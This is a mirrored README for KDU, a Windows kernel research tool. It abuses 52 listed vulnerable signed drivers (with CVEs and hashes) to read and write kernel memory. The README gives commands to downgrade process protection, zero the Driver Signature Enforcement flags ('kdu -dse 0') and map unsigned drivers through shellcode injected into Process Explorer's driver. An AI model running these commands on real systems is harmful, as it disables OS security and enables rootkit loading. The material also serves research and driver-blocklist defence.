Giter Site home page Giter Site logo

kdu's Introduction

Build status

KDU

Kernel Driver Utility

System Requirements

  • x64 Windows 7/8/8.1/10/11;
  • Administrative privilege is required.

Purpose and Features

The purpose of this tool is to give a simple way to explore Windows kernel/components without doing a lot of additional work or setting up local debugger. It features:

  • Protected Processes Hijacking via Process object modification;
  • Driver Signature Enforcement Overrider (similar to DSEFIx);
  • Driver loader for bypassing Driver Signature Enforcement (similar to TDL/Stryker);
  • Support of various vulnerable drivers use as functionality "providers".

Usage

KDU -list
KDU -diag
KDU -prv ProviderID
KDU -ps ProcessID
KDU -pse Commandline
KDU -dmp ProcessID
KDU -dse value
KDU -map filename
  • -list - list currently available providers;
  • -diag - run system diagnostic for troubleshooting;
  • -prv - optional, select vulnerability driver provider;
  • -ps - modify process object of given ProcessID, downgrading any protections;
  • -pse - launch program as ProtectedProcessLight-AntiMalware (PPL);
  • -dmp - dump virtual memory of the given process;
  • -dse - write user defined value to the system DSE state flags;
  • -map - map driver to the kernel and execute it entry point, this command have dependencies listed below;
    • -scv version - optional, select shellcode version, default 1;
    • -drvn name - driver object name (only valid for shellcode version 3);
    • -drvr name - optional, driver registry key name (only valid for shellcode version 3).

Example:

  • kdu -ps 1234
  • kdu -map c:\driverless\mysuperhack.sys
  • kdu -dmp 666
  • kdu -prv 1 -ps 1234
  • kdu -prv 1 -map c:\driverless\mysuperhack.sys
  • kdu -prv 6 -scv 3 -drvn DrvObj -map c:\install\e3600bm.sys
  • kdu -prv 6 -scv 3 -drvn edrv -drvr e3600bl -map c:\install\e3600bl.sys
  • kdu -dse 0
  • kdu -dse 6
  • kdu -pse "C:\Windows\System32\notepad.exe C:\TEMP\words.txt"

Run on Windows 10 20H2*

Compiled and run on Windows 8.1*

Run on Windows 7 SP1 fully patched (precomplied version)*

Run on Windows 10 19H2 (precompiled version, SecureBoot enabled)*

All screenshots are from version 1.0X.

Limitations of -map command

Due to unusual way of loading that is not involving standard kernel loader, but uses overwriting already loaded modules with shellcode, there are some limitations:

  • Loaded drivers MUST BE specially designed to run as "driverless";

That mean you cannot use parameters specified at your DriverEntry as they won't be valid. That also mean you can not load any drivers but only specially designed or you need to alter shellcode responsible for driver mapping.

  • No SEH support for target drivers;

There is no SEH code in x64. Instead of this you have table of try/except/finally regions which must be in the executable image described by pointer in PE header. If there is an exception occurred system handler will first look in which module that happened. Mapped drivers are not inside Windows controlled list of drivers (PsLoadedModulesList - PatchGuard protected), so nothing will be found and system will simple crash.

  • No driver unloading;

Mapped code can't unload itself, however you still can release all resources allocated by your mapped code. DRIVER_OBJECT->DriverUnload should be set to NULL.

  • Only ntoskrnl import resolved, everything else is up to you;

If your project need another module dependency then you have to rewrite this loader part.

  • Several Windows primitives are banned by PatchGuard from usage from the dynamic code.

Because of unsual way of loading mapped driver won't be inside PsLoadedModulesList. That mean any callback registered by such code will have handler located in memory outside this list. PatchGuard has ability to check whatever the registered callbacks point to valid loaded modules or not and BSOD with "Kernel notification callout modification" if such dynamic code detected.

In general if you want to know what you should not do in kernel look at https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo which contain a few examples of forbidden things.

Kernel traces note

This tool does not change (and this won't change in future) internal Windows structures of MmUnloadedDrivers and/or PiDDBCacheTable. That's because:

  • KDU is not designed to circumvent third-party security software or various dubious crapware (e.g. anti-cheats);
  • These data can be a target for PatchGuard protection in the next major Windows 10 update.

You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware.

Supported Providers

Note: Provider with Id 0 assumed as default if no -prv command is specified.

Id Vendor Driver Software package Version MSFT blacklist*
0 Intel IQVM64/Nal Network Adapter Diagnostic Driver 1.03.0.7 Cert
1 MSI RTCore64 MSI Afterburner 4.6.2 build 15658 and below Page hash
2 Gigabyte Gdrv Gigabyte TOOLS Undefined Name
3 ASUSTeK ATSZIO64 ASUSTeK WinFlash utility Undefined Name
4 Patriot MsIo64 Patriot Viper RGB utility 1.0 Page hash
5 ASRock GLCKIO2 ASRock Polychrome RGB 1.0.4 Page hash
6 G.SKILL EneIo64 G.SKILL Trident Z Lighting Control 1.00.08 Cert
7 EVGA WinRing0x64 EVGA Precision X1 1.0.2.0 Name
8 Thermaltake EneTechIo64 Thermaltake TOUGHRAM software 1.0.3 Page hash
9 Huawei PhyMemx64 Huawei MateBook Manager software Undefined Name, Page hash
10 Realtek RtkIo64 Realtek Dash Client Utility Various Name
11 MSI EneTechIo64 MSI Dragon Center Various
12 LG LHA LG Device Manager 1.6.0.2 Name
13 ASUSTeK AsIO2 ASUS GPU Tweak 2.1.7.1 and below
14 PassMark DirectIo64 PassMark Performance Test 10.1 and below Page hash
15 GMER GmerDrv Gmer "Antirootkit" 2.2 and below Name, Page hash, Cert
16 Dell DBUtil_2_3 Dell BIOS Utility 2.3 and below Page hash
17 Benjamin Delpy Mimidrv Mimikatz 2.2 and below Cert
18 Wen Jia Liu KProcessHacker2 Process Hacker 2.38 and below Name
19 Microsoft ProcExp152 Process Explorer 1.5.2 and below Name, Cert
20 Dell DBUtilDrv2 Dell BIOS Utility 2.7 and below
21 DarkByte Dbk64 Cheat Engine 7.4 and below Cert, Name
22 ASUSTeK AsIO3 ASUS GPU TweakII 2.3.0.3
23 Marvin Hw Marvin Hardware Access Driver 4.9 and below Name
24 CODESYS SysDrv3S CODESYS SysDrv3S 3.5.6 and below Cert
25 Zemana amsdk WatchDog/MalwareFox/Zemana AM 3.0.0 and below
26 HiRes Ent. inpoutx64 Various 1.2.0 and below
27 PassMark DirectIo64 PassMark OSForensics Any
28 ASRock AsrDrv106 Phantom Gaming Tuning 1.0.6 and below
29 Arthur Liberman ALSysIO64 Core Temp 2.0.11 and below
30 AMD AMDRyzenMasterDriver Multiple software packages 2.0.0.0 and below
31 Hilscher physmem Physical Memory Viewer for Windows 1.0.0.0 Cert, Name
32 Lenovo LDD Lenovo Diagnostics Driver for Windows 10 and later 1.0.4.0 and below Cert, Name
33 Dell pcdsrvc_x64 Dell PC Doctor 6.2.2.0
34 MSI winio MSI Foundation Service Undefined
35 HP EtdSupport ETDi Support Driver 18.0 and below Cert
36 Pavel Yosifovich KExplore Kernel Explorer Undefined
37 Pavel Yosifovich KObjExp Kernel Object Explorer Undefined
38 Pavel Yosifovich KRegExp Kernel Registry Explorer Undefined
39 Inspect Element LTD EchoDrv Echo AntiCheat (spyware) Undefined Hash
40 NVidia nvoclock NVidia System Utility Driver 7.0.0.32
41 Binalyze IREC Binalyze DFIR 3.11.0
42 DavidXXW PhyDMACC SLIC ToolKit 1.2.0 Page hash
43 Razer rzpnk Razer Synapse 2.20.15.1104
44 AMD PdFwKrnl AMD Radeon™ Software (Adrenalin Edition and PRO Edition) 23.9.1 and below
45 AMD AODDriver AMD OverDrive Driver 2.1.5 and below
46 Wincor Nixdorf wnBios64 WinBios Driver 1.2.0 and below
47 EVGA EleetX1 EVGA ELEET X1 1.0.16.0 and below
48 ASRock AxtuDrv AsRock Extreme Tuner Undefined
49 ASRock AppShopDrv103 ASRock APP Shop 1.0.58 and below
50 ASRock AsrDrv107n ASRock Motherboard Utility 3.0.498 and below
51 ASRock AsrDrv107 ASRock Motherboard Utility 3.0.498 and below
52 Intel PmxDrv Intel(R) Management Engine Tools Driver 1.0.0.1003 and below

MSFT blacklist types:

  • Cert - by certificate used to sign the driver which makes it possible to ban huge number of files at one time.
  • Name - by original filename entry stored inside VERSION_INFO file resources, this type of bans are only possible with cross-checking of file version otherwise it will cause false-positives in case if the driver has "fixed/unaffected" version.
  • Hash/Page hash - by authenticode hash/page hash, allows MSFT to ban exact driver file.

KDU provider details, alternatives are available

Id Codebase Assigned CVE's Hashes
0 Original CVE-2015-2291 File(SHA1): D04E5DB5B6C848A29732BFD52029001F23C3DA75
Authenticode(SHA1): 2CBFE4AD0E1231FF3E19C19CA9311D952CE170B7
Page(SHA1): 55B90A6E4323FC1D7B71B23F81FC758F45740E02
Page(SHA256): FB14DC1657C0EDD18FA747005EB7125DBBD83595095D67906BB0B4D57222D4C1
1 Semi-original CVE-2019-16098 File(SHA1): F6F11AD2CD2B0CF95ED42324876BEE1D83E01775
Authenticode(SHA1): 4A68C2D7A4C471E062A32C83A36EEDB45A619683
Page(SHA1): 84152FA241C3808F8C7752964589C957E440403F
Page(SHA256): A807532037A3549AE3E046F183D782BCB78B6193163EA448098140563CF857CB
2 MAPMEM CVE-2018-19320 File(SHA1): FE10018AF723986DB50701C8532DF5ED98B17C39
Authenticode(SHA1): 0F5034FCF5B34BE22A72D2ECC29E348E93B6F00F
Page(SHA1): DC02DA48DF2F9B558453847399A8DE47C5AD56CC
Page(SHA256): 95406C37FDE1B08524FAB782200C8BECAEC98A40B020F41C5BA13032FE9522FA
3 Semi-original CVE-2023-41444 File(SHA1): 490109FA6739F114651F4199196C5121D1C6BDF2
Authenticode(SHA1): B66BF2B1B07F8F2BAB1418131AE66B0A55265F73
Page(SHA1): 04384DE86A18CE8D17DB3BB33CB9DD06868D4C32
Page(SHA256): 1871BE94AD775FD220F9A04C0F6B84C2C34CF898A4096E94359D9E5E269835DC
4 WINIO CVE-2019-18845 File(SHA1): E6305DDDD06490D7F87E3B06D09E9D4C1C643AF0
Authenticode(SHA1): 7E732ACB7CFAD9BA043A9350CDEFF25D742BECB8
Page(SHA1): CDE1A50E1DF7870F8E4AFD8631E45A847C714C0A
Page(SHA256): 05736AB8B48DF84D81CB2CC0FBDC9D3DA34C22DB67A3E71C6F4B6B3923740DD5
5 WINIO CVE-2018-18535, CVE-2018-18536, CVE-2018-18537 File(SHA1): CC51BE79AE56BC97211F6B73CC905C3492DA8F9D
Authenticode(SHA1): D99B80B3269D735CAC43AF5E43483E64CA7961C3
Page(SHA1): 51E0740AAEE5AE76B0095C92908C97B817DB8BEA
Page(SHA256): E7F011E9857C7DB5AACBD424612CD7E3D12C363FDC8F072DDFAF9E2E5C85F5F3
6 WINIO CVE-2020-12446 File(SHA1): B4D014B5EDD6E19CE0E8395A64FAEDF49688ECB5
Authenticode(SHA1): 651B953CB03928E41424AD59F21D4978D6F4952E
Page(SHA1): 3727D824713E733558A20DE9876AABF1059D3158
Page(SHA256): 88C83F618C8F4069DED87C409A8446C5A30E22A303E64AAFF1C5BE6302ADEDB4
7 WINRING0 CVE-2020–14979 File(SHA1): 012DB3A80FAF1F7F727B538CBE5D94064E7159DE
Authenticode(SHA1): 7AED8186977FCF7EE219DA493BAECDB95EC8040D
Page(SHA1): 9AB2257AE97DB4B0617640C90DD45AB7F144FBB9
Page(SHA256): D48209A183CDFEAADBD8A644730BD76BBF89C759844890739F934F242C226305
8 WINIO File(SHA1): 3CD037FBBA8AAE82C1B111C9F8755349C98BCB3C
Authenticode(SHA1): CE280412DD778CAFBE6DBB05B8CAB42E98D3AE56
Page(SHA1): 6CAFC03207391464AB7E69F47228CB82539BEBDE
Page(SHA256): 3F88ABF8908108207DA38DBC9E8690B3D63DB7F856B16E9F0D3A3B389FC72561
9 WINIO File(SHA1): 6ECFC7CCC4843812BFCCFB7E91594C018F0A0FF9
Authenticode(SHA1): 3C9F40AC72B0202CB40627FDEB7298079187193A
Page(SHA1): 6E7D8ABF7F81A2433F27B052B3952EFC4B9CC0B1
Page(SHA256): B7113B9A68E17428E2107B19BA099571AAFFC854B8FB9CBCEB79EF9E3FD1CC62
10 PHYMEM File(SHA1): B21CBA198D721737AABD882ADA6C91295A5975ED
Authenticode(SHA1): 7593D46A73EC00E00AEF3E9D0031C2B21B74ECFB
Page(SHA1): D4B640263D2A6C9906D4032F252CC81D838E2116
Page(SHA256): 77EC9BF2DBB106EF51D4DE49E70801D48001BF06146A370D0669E385B87C0826
11 WINIO File(SHA1): A87D6EAC2D70A3FBC04E59412326B28001C179DE
Authenticode(SHA1): 6B60825564B2DCCFF3A4F904B71541BFE94136C9
Page(SHA1): 8911B97A3140C2523287E1039B08DE8EF4D7F9AB
Page(SHA256): 85859FFD16396D0FE9897BAFBDCE94FF66474DCDEF7754FCDF2C9C7A8CE451DB
12 Semi-original CVE-2019-8372 File(SHA1): 3FD55927D5997D33F5449E9A355EB5C0452E0DE3
Authenticode(SHA1): 87C155D933CA3513E29D235562D96B88D3913CDE
Page(SHA1): B565361205846323911766F55E380D93C6A3AB02
Page(SHA256): 4818AA3F52BCF3554131B56A3A0F0C2D8BBB5F6D18837F68D811EAD7917A2DE3
13 WINIO CVE-2021-28685 File(SHA1): AA2EA973BB248B18973E57339307CFB8D309F687
Authenticode(SHA1): 92FEE95E32A727D135F1F46CA98C201FFFBF6950
Page(SHA1): C5F1D135831851E9D7A06F9636E2A50B1D5C3A04
Page(SHA256): B4DCE5B50224C2461B49F1850C73EF84E65A64D89E2F32DD931A2F3C62D9D6BF
14 Original CVE-2020-15481 File(SHA1): 2DB49BDF8029FDCDA0A2F722219AE744EAE918B0
Authenticode(SHA1): F1BDD3236F43338A119D74ECA730F0D464DED973
Page(SHA1): A14331F63EC907BF3E472F1E0CB8F19DE06EF4E4
Page(SHA256): 7F0A28CCF0AB76964D40E063F9D4B88193B77E4BADF66E8C8F87C97127885987
15 Original File(SHA1): 83506DE48BD0C50EA00C9E889FE980F56E6C6E1B
Authenticode(SHA1): 0BCA6C35159282FD64615ABC4D398399B061847B
Page(SHA1): 0882AB6651CD17F3D7D696E9C48EB4934159AE4C
Page(SHA256): 0F5DE6DE77D764E2370FA69D3CD8B2C0EC4DFC6F6736C7EDE97F3F75567ED47A
16 Original CVE-2021-21551 File(SHA1): C948AE14761095E4D76B55D9DE86412258BE7AFD
Authenticode(SHA1): E3C1DD569AA4758552566B0213EE4D1FE6382C4B
Page(SHA1): E09B5E80805B8FE853EA27D8773E31BFF262E3F7
Page(SHA256): 7E2AD3D6D76F4FCD4583B865FFC12DE6C44FC16CBCBB81D480CB067F2A860422
17 Original File(SHA1): A8DDB7565B61BC021CD2543A137E00627F999DCC
Authenticode(SHA1): 0E732D18A7D880F0505433A0DA0E100DA0E1C3A3
Page(SHA1): A1E322631A67DE6441A08C991352281CF7C83FD8
Page(SHA256): 787AC1DB370421BD26915EAE797F67AD4C6E53775970DC18226ED5225B0B8A3B
18 Original File(SHA1): D8498707F295082F6A95FD9D32C9782951F5A082
Authenticode(SHA1): 61B55BB7C111F93BD3EA9AC71591E1A6B89FEEE1
Page(SHA1): 15FA18C40598FFD05C7F99DB81EEEA1336FC4213
Page(SHA256): B6033C16527F2ADBC9E8E5C7678F649E55009319B8612765686ACB1A1C82FDDA
19 Original File(SHA1): 3296844D22C87DD5EBA3AA378A8242B41D59DB7A
Authenticode(SHA1): EDC10781EB6D1E3BDF9D15CFEBDDBE1A1FB804D9
Page(SHA1): AF2B5A3F4DBCE417295FB2CECD8DF91C5A679D44
Page(SHA256): 2C22F27671EE4C530C16821CEE2A9F48C19F99B873E36D94C4AAA0194D52B8CB
20 Original CVE-2021-36276 File(SHA1): 90A76945FD2FA45FAB2B7BCFDAF6563595F94891
Authenticode(SHA1): 6BC2AB0F03D7A58685A165B519E8FEE6937526A6
Page(SHA1): 66B2E2438725B576428CBEAE3E481148B4B5FD8C
Page(SHA256): C60578FAD95216EF74BCD9661A562C0DDC2C8697D64B546F59A7EF85F71D3814
21 Original File(SHA1): A54AE1793E9D77E61416E0D9FB81269A4BC8F8A2
Authenticode(SHA1): 1BE4BA36BA9CE5B10D90137C08CC21F823379841
Page(SHA1): 2EF1502DDE6A1CB120AC379F8C7155EB96E4BA02
Page(SHA256): F7443FBAC813EAF0AA94C73265C3BE7E723A5BF64BEF1D80E8FF57D7573FC53C
22 WINIO File(SHA1): CFA85A19D9A2F7F687B0DECDC4A5480B6E30CB8C
Authenticode(SHA1): 4BFC51E23494F7EAF27560F92CD6FBCED2FFA4F6
Page(SHA1): 09C0DC0C0440F9362BD29960236CD716B3E21453
Page(SHA256): 209D5B95C83B4923C825DF9F3DE5F5EFCEFA0C2F82FD77D9BB38FE41E81B3D02
23 Original File(SHA1): 4E56E0B1D12664C05615C69697A2F5C5D893058A
Authenticode(SHA1): 6E87CD3B027A07A810164D618E3F2FCE61EB6EC4
Page(SHA1): 45F1309E10159325BA1DFAE4CAE214BD07B355F1
Page(SHA256): EF15F8CE1C905139AC64C15C2E91E808054421D2B95E2F531EFC6FC5D9D2A471
24 MAPMEM CVE-2022-22516 File(SHA1): E1069365CB580E3525090F2FA28EFD4127223588
Authenticode(SHA1): 432B5809D84935D15574DE8D64B22E06682FF715
Page(SHA1): 13EA5846AFE3B9141C712FAFBA9F1B95B26087E5
Page(SHA256): 6E0C60A5AA46C6CCE7EB4EFA8D36D6D343C0D26694D8A9E194F254988603FC26
25 Original CVE-2021-31728, CVE-2022-42045 File(SHA1): 290D6376658CF0F8182DE0FAE40B503098FA09FD
Authenticode(SHA1): 084553447BDBC056BBE49BAD8ACFAF25EB83462A
Page(SHA1): 760DE62D6AF5F8CD46E2B2074CDF7B0805B58484
Page(SHA256): 8BFEE3E7582C0432CD02A8D75D00B8CBA9CD9A2525E3E61E0D0C8AAAC2FCFEEB
26 WINIO File(SHA1): 6AFC6B04CF73DD461E4A4956365F25C1F1162387
Authenticode(SHA1): 8E1F51761F21148F68AC925CC5F9E9C78F3D5EC4
Page(SHA1): 83714FAAF1643DBA7ABF28A4AC287A43FDEBDE81
Page(SHA256): 1D665C5DDA5E49B5C7F5231327D4A41D83201107CF428800EF24FDBB1CC505F7
27 Original File(SHA1): 01B95AE502AA09AABC69A0482FCC8198F7765950
Authenticode(SHA1): 4AEA4FBB9A732D57643F61F1BF3B82CEBB18AB72
Page(SHA1): 981F8CC044C6E21E2A4746B47EBEBAEEF49B9114
Page(SHA256): 50F9C8874653A6C25179C33EAEB19A6EC4C21BCB1EB14429DD0746C338766911
28 RWEverything CVE-2020-15368 File(SHA1): B0032B8D8E6F4BD19A31619CE38D8E010F29A816
Authenticode(SHA1): F621633290173DAAC18BB14CA3F52BC027CD2721
Page(SHA1): 32F6424734185AF58281EA4C66805A8238E61427
Page(SHA256): 281D8225E91591F799F93BF448F78F3F50B9AA7D6F1ADD3E2AC58D6BA0DE1473
29 Original File(SHA1): 256D285347ACD715ED8920E41E5EC928AE9201A8
Authenticode(SHA1): 530DD2863A09DC57801D62551C48EB9E48476FE8
Page(SHA1): 845EE7617D94A6A13016419B94CFC2D15D9BB71A
Page(SHA256): C13FDB8225E21B899A340506DB055B949C941A33D8C2D73C81E46BF5C4DDFF47
30 Original CVE-2020-12928 File(SHA1): CEC887F20AB468CAA1C99FCBE7FBDFAB25FADF39
Authenticode(SHA1): E37C6AA2630FA3CCB3EE7D219A7332CCE95FA11F
Page(SHA1): 70A164E25FD351CEDFEDEB3D89871A1D487D0379
Page(SHA256): E47556832FA7CF286FFD7F7A0646FA8015AF651D5C968F20353F6B7CFF18A1DC
31 Original File(SHA1): 17614FDEE3B89272E99758983B99111CBB1B312C
Authenticode(SHA1): FD0CB3EA1DEB4FDB22536A7C15669EB53315E5C8
Page(SHA1): 0D03AC1B15AE10BB40A7660F25F3A68E1330024E
Page(SHA256): CB27AD883FCF265B8E2C8D393C0B403914C1911A935A5D248B4C37B4D99CD7BE
32 Original CVE-2022-3699 File(SHA1): B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F
Authenticode(SHA1): 6D9543725ACA0C9C8F403425952692CCC1D2D7F2
Page(SHA1): B40A38E4D3BFB567F313A190A30F3AA9189EC1A0
Page(SHA256): 4273E0BE1A21142DE6BA672EFDAC0AC1FADC7AF0D0DAACA4E4D330D02C8F4CC8
33 Original CVE-2019-12280 File(SHA1): D0A228ED8AF190DEC0C1A812E212F5E68EE3B43E
Authenticode(SHA1): 85D493F5636B46F6C4F8B1028F8E8659F31DC562
Page(SHA1): A48431302A6C5053D178FCEC3390FBC1CACCB893
Page(SHA256): 08AFD2489CB6A093E3F588B1D13D20468AE3E27A2F0AEC9E43C41D20FFB2F6EE
34 WINIO File(SHA1): 9745D77E3C27437BBCCF39E074F7D57A99FE83B1
Authenticode(SHA1): 1419392FC1EC6EF497442FEE3F7553A68B78A03D
Page(SHA1): 863F4AFE82D791D655B2DCE5C893B37422364230
Page(SHA256): F3165AFC15FA99745D7151501E1E2A738AD04DA5A4E76E5CE135B8E247AE0D1D
35 Original File(SHA1): A57EEFA0C653B49BD60B6F46D7C441A78063B682
Authenticode(SHA1): 96FAA975FEB28588372A98A1E77D98AF7FC90E41
Page(SHA1): 197859EEFBCF17BE48A3C49818B35F263701755F
Page(SHA256): 5C8C0FC9B3B7C6C7E6BDD83A8D3ED44E075D9C3B42463E1CC5EE28049517488E
36 Original File(SHA1): 090A4FC285D4F47B1E6A1011353A329C1F4C8E09
Authenticode(SHA1): C77403CFFCD15438EA3DDDF0763AB0A70A9100CB
Page(SHA1): DCCA45C770E93BCF9FC7A9ADFC4653AE744C798C
Page(SHA256): DE88E584BC88C463F479CAA5A6F4C166B8180E2AEAC62A54879875D374704631
37 Original File(SHA1): 3303BA52A334DA58A4992C4F9FBA7272E294B7AF
Authenticode(SHA1): 43239D3355CED44FB56C4127BF96EF2ED1BE2780
Page(SHA1): 6ECDAAECEB20B8D037FD4508A4B1DCE1ADCD2203
Page(SHA256): 6DA94C767419BAFB993B39913CD99146EB80FC13B5A6D5DE96829E084D4CFC83
38 Original File(SHA1): F3383FE0FF00BDEA1AA9E68BCAAD8B83885E306D
Authenticode(SHA1): D889E03CE654903A5113F49F49A1C23F3317E7D0
Page(SHA1): 0773B431922B3208DB0C4A4E02F9CE7297AAE774
Page(SHA256): AE38ADF8B97188675D8F6396F2DC0801C60CBFD546CAEDE915B73E9332DF6C8C
39 Original CVE-2023-38817 File(SHA1): A93197C8C1897A95C4FB0367D7451019AE9F3054
Authenticode(SHA1): 678620A9CC9E7FFE179BC5CDA0A2DD0597E231EE
Page(SHA1): 832832028D40A3CFD08D364554FCE0B4F37317FF
Page(SHA256): 49ED19D5E1E122936035A48EA99FFD68CA4915578107888D5C2B0BB9E30E67C0
40 Original File(SHA1): BDA102AFBC60F3F3C5BCBD5390FFBBBB89170B9C
Authenticode(SHA1): 0FB1D0EF14AB73FCB4C62043859064CC5F9F88C2
Page(SHA1): B754B2C62796004560E2ADF5178099B98F111C25
Page(SHA256): 83D2A9535CDB68A8D6EAE5582DB7A70E01A520151448CEB572D96566A2AECB82
41 Original CVE-2023-41444 File(SHA1): D2FB46277C36498E87D0F47415B7980440D40E3D
Authenticode(SHA1): 719F659300BA463EFEEAB5916F0378C64FC1AD4A
Page(SHA1): F7FEA2BE8FF65DBB89BAF39EF8E0D80DAB81CB8E
Page(SHA256): 5FEB045C2452FD280BA1CAD5FC9B4F0DE7FC95EABDCE19FA2CD1F632891F3B1A
42 WINRING0 File(SHA1): 177B541412A45646177B2352FA2D9E89E0EEFE5A
Authenticode(SHA1): 200ABD07303234FC114360D9DABC38DA1F1F2A22
Page(SHA1): 84B91B1AED8F83DE14323089148BE2577FDC826C
Page(SHA256): B8502DB6B8947E5D852102166D0BEF8252EA3431D582E968EF44C35E56609C91
43 Original CVE-2017-9769 File(SHA1): F999709E5B00A68A0F4FA912619FE6548AD0C42D
Authenticode(SHA1): 1AC31466261A6DA69FBEB8E99D0B7B772071AC7F
Page(SHA1): 4EC299E9A539F6BC194BD3D436B24A565BD32EF4
Page(SHA256): C8CE0EE4FF58779A292B5626D9953888A1A04799E18924CB7A075095C25042E8
44 Original CVE-2023-20598 File(SHA1): A24840E32071E0F64E1DFF8CA540604896811587
Authenticode(SHA1): 661A1A28950CEC3F2C3D0E72AB2A05D4A173CF9A
Page(SHA1): 869BED04EB66492AC532E36C3C6171AB34DA1A00
Page(SHA256): E5DC6305227951B05997CD147C59795991F7EDE52461D069EFE1D568DD25C580
45 Original CVE-2020-12928 File(SHA1): 17D28A90EF4D3DBB083371F99943FF938F3B39F6
Authenticode(SHA1): 9A329362E340FC8363E67FB5F23A8391CB83BF00
Page(SHA1): 0BC84A62ABD3CA20305FB834592928C2317439D6
Page(SHA256): 76C7A12CDE2FDC80A6AF0A58E7698FC1F5EC8746EFB461FB07155B7065480715
46 WINIO File(SHA1): AEC96520E85330594D3165C86CB92EAC34C1E095
Authenticode(SHA1): A7179D7CF5EE58276C3C42A16195A0B733F31B53
Page(SHA1): AF7FED1C68BB2D459F7778EC6D20459618CF3D26
Page(SHA256): 490B1FFC374F9CDEC57BBCE9DAD93251516DE93C7A7F3475D8AC55A6DCBB958E
47 Original File(SHA1): DA66B66DCA5EA8689DB903EC23E98F2C881DE6F8
Authenticode(SHA1): A8D16FED8999033126D60C656A3BA359DFAA559F
Page(SHA1): 082FBFF03465F78276D5A2066398A9D3C73DB9AB
Page(SHA256): F677A9447400EAEE6E12A88F59AAADCF6DDF8F16EC8F7612BF50AB378A9B9012
48 RWEverything File(SHA1): 3F6A997B04D2299BA0E9F505803E8D60D0755F44
Authenticode(SHA1): E7FAC017B371A43276E03BF5F71D437E8D377930
Page(SHA1): EE9A5A98C257F2D50030B7F3AB6D7DA805FCC150
Page(SHA256): D159D969E05C83F27F446BCC5F171A0043CC3DF0B518962CEE7ACBE30BCC02F8
49 RWEverything File(SHA1): 6074C2360F5DC74738873A525DFBD67EB6625986
Authenticode(SHA1): 03C523F31603C460076AD549F985DD9533734E95
Page(SHA1): 85B6FC43E943C9EB9B3DE1FF82A56870620CC1CF
Page(SHA256): A3AF7747FAC60B814FA6717B174F1199B9D163081B55AE40CEDD9983B6D033F5
50 RWEverything File(SHA1): 11D7E0D29AB17292FD43BDD5CCB7DA0403E50E52
Authenticode(SHA1): CA06D9FD91F7B681204B35975D5C069D0DABE276
Page(SHA1): B7693E1170B01F24A824892607C2258CA653805A
Page(SHA256): B8776F6889CF3D8252F0912DD9745F8EFF4513292DF2B2B1D484CDBC68FBAE4C
51 RWEverything File(SHA1): B1FAD5DA173C6A603FFFE20E0CB5F0BDCA823BD5
Authenticode(SHA1): 268073AD0B17E2161C1A2A6C5B1BDEBB7B3011B4
Page(SHA1): 0B48F35DAF8B8BC9BA4E413EF222415EAB791AE0
Page(SHA256): B073907634013A8EB65E4C8AA42535BAD08101E58B7B1489AEE395B7BE9C69E2
52 Original File(SHA1): 9E5FCAEA33C9A181C56F7D0E4D9C42F8EDEAD252
Authenticode(SHA1): 7919108CB1278503EC4A78DD25694C6770EAA989
Page(SHA1): E1CE5A5E2CEB0AAD9CB588A900BF471462FAC42B
Page(SHA256): 6991344C8771FC717F878F9A6B0C258BC81FB3BF1F7F3CBED3EF8F86541B253F
*At commit time, data maybe inaccurate.

More providers maybe added in the future.

How it work

It uses known to be vulnerable (or wormhole by design) driver from legitimate software to access arbitrary kernel memory with read/write primitives.

Depending on command KDU will either work as TDL/DSEFix or modify kernel mode process objects (EPROCESS).

When in -map mode KDU for most available providers will by default use 3rd party signed driver from SysInternals Process Explorer and hijack it by placing a small loader shellcode inside it IRP_MJ_DEVICE_CONTROL/IRP_MJ_CREATE/IRP_MJ_CLOSE handler. This is done by overwriting physical memory where Process Explorer dispatch handler located and triggering it by calling driver IRP_MJ_CREATE handler (CreateFile call). Next shellcode will map input driver as code buffer to kernel mode and run it with current IRQL be PASSIVE_LEVEL. After that hijacked Process Explorer driver will be unloaded together with vulnerable provider driver. This entire idea comes from malicious software of the middle of 200x known as rootkits.

Shellcode versions

KDU uses shellcode to map input drivers and execute their DriverEntry. There are few shellcode variants embedded into KDU. Shellcode V1, V2 and V3 used together with 3rd party victim driver (Process Explorer, by default). They are implemented as fake driver dispatch entry and their differences are: V1 uses newly created system thread to execute code, V2 uses system work items, V3 manually builds driver object and runs DriverEntry as if this driver was loaded normally. Shellcode V4 is simplified version of previous variants intended to be run not like an driver dispatch entry. While theoretically all "providers" can support all variants this implementation is limited per provider. You can view it by typing -list command and looking for shellcode support mask. Currently all providers except N21 support V1, V2 and V3 variants.

Build and Notes

KDU comes with full source code. In order to build from source you need Microsoft Visual Studio 2019 and later versions. For driver builds you need Microsoft Windows Driver Kit 10 and/or above.

Complete working binaries include: kdu.exe (main executable) and drv64.dll (drivers database). They must reside in the same directory that must have R/W access enabled for kdu.exe. All binaries MUST BE compiled in "Release" configuration. In order to use providers that require Microsoft Symbols usage you need to put dbghelp.dll and symsrv.dll from the Debugging Tools For Windows into KDU directory.

Utils and Notes

GenAsIo2Unlock is a special utility used to generate "unlocking" resource which is required for working with AsIO2 driver. Full source of this utility included in Source\Utils\GenAsIo2Unlock. Compiled version located in Sources\Hamakaze\Utils\GenAsIo2Unlock.exe. Warning this utility is set on execution at post-build-event for both Debug/Release configurations. If you don't want to run precompiled version replace it with newly compiled from sources. If you remove this post-build-event newly compiled KDU will NOT BE ABLE to use AsIO2 driver (provider #13).

Reporting bugs and incompatibilities

If you experienced bug or incompatibility while using KDU with 3rd party software or OS feel free to fill the issue. However if this incompatibility is caused by your own actions such reports will be ignored. Any BSOD reports should include minidump attached or your own dump analysis (windbg !analyze -v), issues without these information will be ignored.

Anticheat, antimalware incompatibilities will be ignored, that's your own fault.

Disclaimer

Using this program might crash your computer with BSOD. Compiled binary and source code provided AS-IS in hope it will be useful BUT WITHOUT WARRANTY OF ANY KIND. Since KDU rely on completely bugged and vulnerable drivers security of computer where it executed maybe put at risk. Make sure you understand what you do.

Third party code usage

References

Wormhole drivers code

They are used in multiple products from hardware vendors mostly in unmodified state. They all break OS security model and additionally bugged. Links are for educational purposes of how not to do your drivers. Note that following github account have nothing to do with these code, these code in unmodified state and provided only for educational purposes.

Authors

(c) 2020 - 2024 KDU Project

kdu's People

Contributors

hfiref0x avatar lauralex avatar mihaly044 avatar oicu0619 avatar opsecko avatar

Stargazers

